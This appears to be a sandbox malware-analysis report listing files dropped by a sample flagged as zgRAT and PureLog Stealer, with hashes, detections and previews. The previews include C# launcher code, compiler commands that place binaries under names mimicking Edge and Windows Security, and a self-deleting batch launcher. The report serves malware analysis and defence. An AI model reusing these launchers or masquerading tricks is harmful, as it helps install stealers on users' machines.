                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A.n...............0.................. ........@.. ....................................@.................................t...W.......b............................................................................ ............... ..H............text....... ...................... ..`.rsrc...b...........................@..@.reloc...............f..............@..B........................H............)......E...........P .......................................................................................................................................................................D~..;...].1...!H...N.I..N...e.F..X.....V:......)..]"..fSZ.{f....PQAeS~....'^.:.k.;.E...X.....K0.U vm...v...L%....O*...5D.&b....ZI..g%...E...]/u..L...F......k._......mz.RY...-.t!.X.i)I..D..ju.yx.X>k..q.'.O...... .f..:.}.J.c.1..Q3`.S.Ebdw.k........+..HhXpE....l..{..Rs.#.K..r

                                                                                            C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.0.cs

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):387
                                                                                            Entropy (8bit):4.917397551942817
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLANH9fiFkMSf+eBL6u+tiFkD:JNVQIbSfhGiFkMSfhWDkFkD
                                                                                            MD5:833AEA92819CAA4768C4CD7E508FF80D
                                                                                            SHA1:99EE9332A150499393BDBB93D21DE51887473595
                                                                                            SHA-256:C2B421ACEDD36F46BD1866CEE5DCF64C19A249138B80A8CCBE0754A5C985A75D
                                                                                            SHA-512:F262FA165701A477A5E39E1B2535D6D0DBE5959A6F61498AFDB2E5BA014C68F2A13AF9CAA4BFA639FFACC5088DF96E04F3F5B1C467B391DAF51F675C5F99693F
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Roaming\Update.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Windows Mail\System.exe"); } catch { } }).Start();. }.}.

                                                                                            C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.cmdline

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):254
                                                                                            Entropy (8bit):5.067692825066608
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRPcNwiaZ5IwBzxsjGZxWE8ocNwi23fBPpHPn9n:Hu7L//TRLNHHcQlZH9
                                                                                            MD5:7601AFF0856EEA5188091D3D0BD0853B
                                                                                            SHA1:F86D1B357F3FE218BF163703CDC5376145A918A7
                                                                                            SHA-256:7BD1D910742075D8B31850487B1B0B943BE2E1EE4A6471BDDFA823E3571D4EA7
                                                                                            SHA-512:1CB96A24A059052BC38AC954B83482EEAA3E9D7200AC2DC12E68A08E39CB2F92FBC71BDE7411F98A0A46D1975623F527D6DFC5C3BD0B55306F397F4382FB74E3
                                                                                            Malicious:false
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Roaming\Update.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.0.cs"

                                                                                            C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.out

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (332), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):753
                                                                                            Entropy (8bit):5.264493827961545
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:+Xa/I/u7L//TRLNHHcQlZH4KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:j/I/un/VxtDYKax5DqBVKVrdFAMBJTH
                                                                                            MD5:58BD6C04D3088C15C9EA19211070780C
                                                                                            SHA1:8B10242DEB620244A01DA24E91C701244C2273DC
                                                                                            SHA-256:A46FF306F6B8E821B88A102C3685F328878D8986FC80AC9D6C38B60A7D070F6F
                                                                                            SHA-512:6BB4BB7838C985D17AB31048432ED8C68D56C0B7D3803136EB68F709FDE76017EDCE024B635153A3D9D407B22E2EE9E91C7C073880A6CC8854904A88F7DD1658
                                                                                            Malicious:false
                                                                                            Preview:.C:\agentwebreviewDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Users\user\AppData\Roaming\Update.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\dqjfixj4\dqjfixj4.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                            C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.0.cs

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):402
                                                                                            Entropy (8bit):4.922649339213585
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBL6u+tiFkD:JNVQIbSfhWLzIiFkMSfhWDkFkD
                                                                                            MD5:EF08BA6FE86E6EF1722A078FA0CF8F60
                                                                                            SHA1:1BEC3CA03E8A831AF72FEDA8B440868FDE133919
                                                                                            SHA-256:C0663F054591364D51319D2B040B9BAEDCCA03F81CBBB206D9C5BFEF625B54F9
                                                                                            SHA-512:8E19968DA2082E793E702C51706F7162D33DF6F5F0714CF819FAE84409EEA7AF60B4039520DF454A3C2F95795992D680740425834A7F8D9CB8D62E0EA4BD767E
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Windows Mail\System.exe"); } catch { } }).Start();. }.}.

                                                                                            C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.cmdline

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):269
                                                                                            Entropy (8bit):5.205307289322903
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8ocNwi23f53bn:Hu7L//TRRzscQlZtb
                                                                                            MD5:065D5DB89F3B0AA87E838EBE2E900C8A
                                                                                            SHA1:EB2EDF425681A521C6ED5898EB7F1323D2DD815F
                                                                                            SHA-256:80273BA6C2616ACD5E83975F2F1472B38ECBDEB8DF27CB4F4D15105EEE359958
                                                                                            SHA-512:EBD65E7915D2298A1F1511952C70BD112F9E1C4FFD530031481689F1CE7A18332CAE65C9BD28F3AAB0B4C46B5147F8785400FC5E84F3F18B93C7581ADD7E54DA
                                                                                            Malicious:true
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.0.cs"

                                                                                            C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.out

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (347), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):768
                                                                                            Entropy (8bit):5.2779664028590725
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:+Xa/I/u7L//TRRzscQlZtaKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:j/I/un/VRzstDtaKax5DqBVKVrdFAMBt
                                                                                            MD5:4EE248593C857B22F5EA3CE35746D298
                                                                                            SHA1:B784DFA8793C06907EAD4E818F3025A191004704
                                                                                            SHA-256:E1BB292D06442922B165F75BF195D07F168025C85E06FC4F056E025ECB6CB82B
                                                                                            SHA-512:B469796CB1EA1C250AECC48F71DA4A588B93DB78352009E495EED0E5505AD0526E039DBC30BB0630E829775DF46492C6F16C1EF24686FC7F192C20F0232F1D74
                                                                                            Malicious:false
                                                                                            Preview:.C:\agentwebreviewDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\j2qo545d\j2qo545d.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                            C:\Users\user\AppData\Local\Temp\jxseyegkwF.bat

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):229
                                                                                            Entropy (8bit):5.192137842300063
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:hCijTg3Nou1SV+DE1c6xCyfobKOZG1cNwi23fnv:HTg9uYDEBxLdZ/v
                                                                                            MD5:79DD8BD55E0D1E170A0BEEDA25FA236E
                                                                                            SHA1:92294343B6067682776D1E1393D66CF92481DE64
                                                                                            SHA-256:98D879AC4C0696243806F3D5A91E6F36CA11F81D07D2F331CB5AE138C9E025A5
                                                                                            SHA-512:01C219AA22A30E30B5C34D140AE0497BCF9281D84FCC6C4DA9EEE762F7CFA456C58FAB10E1769DCE1CC78E062853868FD26A6BB6E882366A1BF6CE990D06FEDE
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\jxseyegkwF.bat"

                                                                                            C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.0.cs

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                            Category:dropped
                                                                                            Size (bytes):387
                                                                                            Entropy (8bit):4.877714413950026
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6u+tiFkD:JNVQIbSfhV7TiFkMSfhWDkFkD
                                                                                            MD5:6D73A34B0AC7057479969B66115ABB33
                                                                                            SHA1:9814CAD735D98FB4898E745CFA043CCAB320E9A0
                                                                                            SHA-256:AD96117877C32E3574BA4BAFF669E666172AEF3CB1C26F66894A2410FEC956A2
                                                                                            SHA-512:CB035DA4961B25CFEF067823D0C519F0E89F247341F40A471346336EB9DF54F9E80C1BAB0A583E15AD9E10A53C66A59C373C45A296AC089F882BA06F7B2282F2
                                                                                            Malicious:false
                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files\Windows Mail\System.exe"); } catch { } }).Start();. }.}.

                                                                                            C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.cmdline

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):254
                                                                                            Entropy (8bit):5.0844187478504885
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8ocNwi23fv:Hu7L//TRq79cQlZn
                                                                                            MD5:E45AB3BB1BEC4F9DA14C464A735430DE
                                                                                            SHA1:51D33F90BD085E0C49465EE9E89A2BBE7CB9E81D
                                                                                            SHA-256:C024624644543CF8DC2CD9BDA1FDA30BFCA35178E787C041B3B07B15ABA6DB0D
                                                                                            SHA-512:CD81CCFFC54E09DFDABCB32BA5A39CD7E397F598ABCA790776B8972DB1BE0DCBE4A096C9EC4AA00D86ADFDAA5189323DE36E0C8F5F20EF5BA439D3B0FF4BDC06
                                                                                            Malicious:false
                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.0.cs"

                                                                                            C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.out

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (332), with CRLF, CR line terminators
                                                                                            Category:modified
                                                                                            Size (bytes):753
                                                                                            Entropy (8bit):5.255342483175257
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:+Xa/I/u7L//TRq79cQlZuKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:j/I/un/Vq79tDuKax5DqBVKVrdFAMBJj
                                                                                            MD5:C56B369B887DCC827D515C4CEEBFE091
                                                                                            SHA1:EC3FC22E00689D16564A3463389ACC7BB3D872CA
                                                                                            SHA-256:FCDCF21ADF0850974B172E04D441360B934A22EF7061C8F69AD29EE557E2320B
                                                                                            SHA-512:EC8F6830CFE5D65DF3F52956DFAD9297117273097DE664F6FF35A06BF1E1371120AA1987D01A3450C2750303D0ED5A6A01FB2532EC4D89C98BD09799F336BF4F
                                                                                            Malicious:false
                                                                                            Preview:.C:\agentwebreviewDhcp> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\la3xll1v\la3xll1v.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                            C:\Users\user\AppData\Local\Temp\rqbprm.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2705596
                                                                                            Entropy (8bit):7.601024437340247
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:IBJTds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEBH:yVdd+9YPEWg/q3Jqhd6yrChMaH
                                                                                            MD5:693F4A6FC50DDA899DE3F006DE04951E
                                                                                            SHA1:01ACBE1FCD56906D2F8A4DC24E98D396D1C0ABE3
                                                                                            SHA-256:ACE4474F28AB83A152D7F14F2701754DB1EEB7A4A04AC4AFDF65C6C6F4709B68
                                                                                            SHA-512:4AA5022052EA762F87F421F90B640F85B32CF3714807B93B6801FD4286DA2311AAAEB5FE7DA3780298A3A1B404976E3E5B18E29A2DBDDFF5BDE687AD61DEA903
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 74%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I.>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I.=>...I..=>..Rich<>..........PE..L..... b............................0........0....@..........................P............@.........................p...4.......P....@....................... ..<#......T............................U..@............0..x....... ....................text............................... ..`.rdata.......0....... ..............@..@.data... G..........................@....didat.......0......................@....rsrc........@......................@..@.reloc..<#... ...$..................@..B................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\vyMukl4C3L

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.293660689688184
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:MCXAESmw:tvw
                                                                                            MD5:E08A7734854F9985D069131E3C9B0E8D
                                                                                            SHA1:FADC21AEC26024673C1127223545EB0380D5BAAE
                                                                                            SHA-256:C7C86AA043E66033E62CFF407B59617765569ED39FC460B50B67B8E9E62BBFA8
                                                                                            SHA-512:65222D9D92F44E2C4A11AE86CCDCC7B17C556BF2F7460ED4244EB313BD85CB21370339FB4CF5BB1A4B43FB0CE1678088ADF5CB610672B12E339A9975A468C7A4
                                                                                            Malicious:false
                                                                                            Preview:Jac6UEbreNh5mUDCqiN3lwEFU

                                                                                            C:\Users\user\AppData\Roaming\CSC2223B829CAD74E6CA36F406352D1401D.TMP

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            File Type:MSVC .res
                                                                                            Category:dropped
                                                                                            Size (bytes):1168
                                                                                            Entropy (8bit):4.4588400330616
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:mZxT0uZhN1+hBPNnqNdt4+lEbNFjMyi07:yuul1+hzqTSfbNtme
                                                                                            MD5:BF38FE42913AAAB3060562F036C56781
                                                                                            SHA1:2569E40A60E393E85BE2C50CFA830C2E1430822C
                                                                                            SHA-256:0E8F131AD2ED72FDDAEA0919A88AEDFA09CFE5AE30F6FD675AB1FD7ECE211CAC
                                                                                            SHA-512:42D67ABD60177063DC22601C7B0C76AA53000D3196A2BB4C123D2992B907518850C767B2097E0663941AE6C292D95EF08569156E2A286E996662D541D6986F86
                                                                                            Malicious:false
                                                                                            Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...U.p.d.a.t.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...U.p.d.a.t.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                                            C:\Users\user\AppData\Roaming\Update.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\HaLCYOFjMN.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.871183095960517
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6MamLPtixZ8RxeOAEFJ+cV4MKe2eXdTRvvqBHfuul1+hzqXSfbNtm:1PNxvNVx93fvvkxXktzNt
                                                                                            MD5:24FB45BCE32AC5C76ECDF3996F8FDE80
                                                                                            SHA1:E52930E8273D1F29DF9F81087A3486B96232A878
                                                                                            SHA-256:46AA4EB0D9A91C44260EE84A483628ADC8B66226280FD2807114027DF53B06E0
                                                                                            SHA-512:DB57607E18117EE5FA9FDADBC777E926A0FE272D3B03772CF83827F90CD1C4AC16DBFB32BF191A425B36861775561E0DEE11C9F0622FC712C9B4C7366676E4CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                            C:\Users\user\AppData\Roaming\Update.exe.exe (copy)

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):4608
                                                                                            Entropy (8bit):3.871183095960517
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:6MamLPtixZ8RxeOAEFJ+cV4MKe2eXdTRvvqBHfuul1+hzqXSfbNtm:1PNxvNVx93fvvkxXktzNt
                                                                                            MD5:24FB45BCE32AC5C76ECDF3996F8FDE80
                                                                                            SHA1:E52930E8273D1F29DF9F81087A3486B96232A878
                                                                                            SHA-256:46AA4EB0D9A91C44260EE84A483628ADC8B66226280FD2807114027DF53B06E0
                                                                                            SHA-512:DB57607E18117EE5FA9FDADBC777E926A0FE272D3B03772CF83827F90CD1C4AC16DBFB32BF191A425B36861775561E0DEE11C9F0622FC712C9B4C7366676E4CA
                                                                                            Malicious:true
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}g............................~'... ...@....@.. ....................................@.................................,'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                            C:\Users\user\Contacts\7dee1dcd228ada

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:ASCII text, with very long lines (307), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):307
                                                                                            Entropy (8bit):5.80224838093525
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:/kBuFRq3yDNdwbasZtxzT4DCmnYgfMWeW1TjU8sQuYawbB4:kurq3kdw1Zty+mYg0WeWZjIQuYawC
                                                                                            MD5:D107EF47326957BEE65E0ADAD1010380
                                                                                            SHA1:685BC3C1A32E1729D9080DDEEDDD802993FAA082
                                                                                            SHA-256:93EF47DE89342BA31F5C95C9619DEB9837728BE4EA233485C2FE9FD8059995E0
                                                                                            SHA-512:2F0A397202196C812651F7F1EDE24DF71C198425B1B0BC657B1E351F4D4E881D91A566175D67EB4388289D1B4DEC0473762A90BDAC78E6A0B92822EAA79CB2EA
                                                                                            Malicious:false
                                                                                            Preview:gSwhMgoNmpAuQfkflYZY14irie77qq2NMLsoAmi0ouiwVJNpIM4MvfaltE8sjrg6xxhEx5f9zjuHWwWZQRzevpbruG45n0R7Nl8hlJ2Nq5WLuTP7rjbR1CLHWzTqAjV9Sx3vxzxHYlxzSP7b17ODY9FLZ1LwzLMHjX36adJ2vU3QPVzG22zDVSkTssV6oBRNZqP5WAAYyVREGy5DBE37WJvRwkOsHMNuCp1iG4t11bO9AgN3wS5jHT1P58IwwSQmHhBa7W7HVCG45vRPXU5zQomsylnHv7EiKm2cew6ZUyOEN6UJq2Z

                                                                                            C:\Users\user\Contacts\ybWXCCKXKhIvlNpBF.exe

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):2383872
                                                                                            Entropy (8bit):7.66319867768823
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:jds5CCX9YeCEWgvXIjX3L6S6W6Yihd6yrChMKd7gEB:jdd+9YPEWg/q3Jqhd6yrChMa
                                                                                            MD5:943D7E982E4BAB5A7CA659DC390E9A79
                                                                                            SHA1:EC1112B3B8939603C363B24F25BDBC1FACBDC2B1
                                                                                            SHA-256:02801DA071C20E6F6233D99AEC5E8CA6274B4EB1BA793977D27D9FCA3F9EC4D0
                                                                                            SHA-512:DCEEFC8E6426C2EFE08CCF2F61D54E6815C7C679B774FC1538735DCDDAB62B24454C187088F7CEA2E9F23B3702D5C3ECC3B1C725D3712E8F5E07CD0ADBD08407
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 65%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....mg.................X$.........Nw$.. ....$...@.. ........................$...........@..................................w$.K.....$. .....................$...................................................... ............... ..H............text...TW$.. ...X$................. ..`.rsrc... .....$......Z$.............@....reloc........$......^$.............@..B................0w$.....H........... ...................vv$......................................0..........(.... ........8........E....).......N...M...8$...(.... ....~....{r...:....& ....8....(.... ....~....{....9....& ....8....*(.... ....8........0.......... ........8........E............l.......\.......8....r...ps....z*~....(\... .... .... ....s....~....(`....... ....~....{z...:....& ....8.......... ....8w...~....9.... ....~....{....:Y...& ....8N...8v... ....8?.......~....(d...~....(h... ....?J..

                                                                                            C:\Users\user\Desktop\IJgIaehv.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):85504
                                                                                            Entropy (8bit):5.8769270258874755
                                                                                            Encrypted:false
                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                            C:\Users\user\Desktop\MwyHCbxj.log

                                                                                            Download File
                                                                                            Process:C:\agentwebreviewDhcp\portBrowserweb.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):38400
                                                                                            Entropy (8bit):5.699005826018714
                                                                                            Encrypted:false
